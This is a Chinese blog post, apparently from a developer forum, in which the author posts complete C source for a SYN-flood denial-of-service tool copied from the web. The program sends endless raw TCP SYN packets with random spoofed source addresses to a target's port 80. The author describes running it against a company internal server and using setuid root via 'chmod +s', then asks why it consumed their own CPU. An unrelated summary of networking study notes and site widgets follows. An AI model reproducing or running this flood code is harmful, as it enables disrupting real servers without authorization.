dos的疑问

前两天网络学习的时候看到别人写的dos程序,话说可以攻击网络服务器,看了一下原理,大致是通过在TCP三次握手那里做了手脚。把网络上的那个程序copy下来,运行一下,攻击公司的内部服务器(没有反映啊,失落哈),不过出现一个很奇怪的现象。见下图哦!下面贴出在网络搜索的源代码:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
void send_tcp(int ,struct sockaddr_in *addr);
#define portnumber 80
int main(int argc,char **argv)
{
    int sockfd;
    struct sockaddr_in addr;
    struct hostent *host;
    int no;
    no = 1;
    if(argc != 2)
    {
        fprintf(stderr,"Useage:%s hostname/ip address.\n",argv[0]);
        exit(-1);
    }
    bzero(&addr,sizeof(struct sockaddr_in));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(portnumber);
    if(inet_addr(argv[1]) == -1)
    {
        host = gethostbyname(argv[1]);
        if(host == NULL)
        {
            fprintf(stderr,"Hostname error:%s\n\a",hstrerror(h_errno));
            exit(-1);

        }
        addr.sin_addr = *(struct in_addr *)(host->h_addr_list[0]);
    

    }
    if((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1)
    {
        fprintf(stderr,"socket error:%s\n\a",strerror(errno));
        exit(-1);
    }
    setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&no,sizeof(no));
    setuid(getpid());
    send_tcp(sockfd,&addr);
    return 0;
}
void send_tcp(int sockfd,struct sockaddr_in *addr)
{
    char buffer[100];
    struct ip *ip;
    struct tcphdr *tcp;
    int head_len;
    head_len = sizeof(struct ip) + sizeof(struct tcphdr);
    bzero(buffer,100);
    ip = (struct ip *)buffer;
    ip->ip_v = IPVERSION;
    ip->ip_hl = sizeof(struct ip)>>2;
    ip->ip_tos = 0;
    ip->ip_len = htons(head_len);
    ip->ip_id = 0;
    ip->ip_off = 0;
    ip->ip_ttl = MAXTTL;
    ip->ip_p = IPPROTO_TCP;
    ip->ip_sum = 0;
    ip->ip_dst = addr->sin_addr;
    tcp = (struct tcphdr *)(buffer+sizeof(struct ip));
    tcp->source = htons(portnumber);
    tcp->dest = addr->sin_port;
    tcp->seq = random();
    tcp->ack_seq = 0;
    tcp->doff = 5;
    tcp->syn = 1;
    tcp->check = 0;
    while(1)
    {
        ip->ip_src.s_addr = random();
        sendto(sockfd,buffer,head_len,0,(struct sockaddr *)&addr,sizeof(struct sockaddr_in));
        
    }

}
编译连接后,敲入命令chmod +s dos,呵呵,这个命令很有用哦!能够让你的执行程序拥有root权限。

运行后没反映哈,想看看自己linux上的放映,敲入top命令吓我一跳。如下图:


用掉了我99.5%的cpu资源。至今不明白,求高手解释。唉!菜鸟就是这样,攻击别人的不行,结果把自己电脑搞死了。。。。


内容概要:本文档是一份关于交换路由配置的学习笔记,系统地介绍了网络设备的远程管理、交换机与路由器的核心配置技术。内容涵盖Telnet、SSH、Console三种远程控制方式的配置方法;详细讲解了VLAN划分原理及Access、Trunk、Hybrid端口的工作机制,以及端口镜像、端口汇聚、端口隔离等交换技术;深入解析了STP、MSTP、RSTP生成树协议的作用与配置步骤;在路由部分,涵盖了IP地址配置、DHCP服务部署(接口池与全局池)、NAT转换(静态与动态)、静态路由、RIP与OSPF动态路由协议的配置,并介绍了策略路由和ACL访问控制列表的应用;最后简要说明了华为防火墙的安全区域划分与基本安全策略配置。; 适合人群:具备一定网络基础知识,从事网络工程、运维或相关技术岗位1-3年的技术人员,以及准备参加HCIA/CCNA等认证考试的学习者。; 使用场景及目标:①掌握企业网络中常见的交换与路由配置技能,提升实际操作能力;②理解VLAN、STP、OSPF、NAT、ACL等核心技术原理并能独立完成中小型网络搭建与调试;③通过命令示例熟悉华为设备CLI配置逻辑,为项目实施和故障排查提供参考。; 阅读建议:此笔记以实用配置为主,建议结合模拟器(如eNSP或Packet Tracer)动手实践每一条命令,对照拓扑理解数据流向,重点关注VLAN间通信、路由选择机制、安全策略控制等关键环节,并注意不同设备型号间的命令差异。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值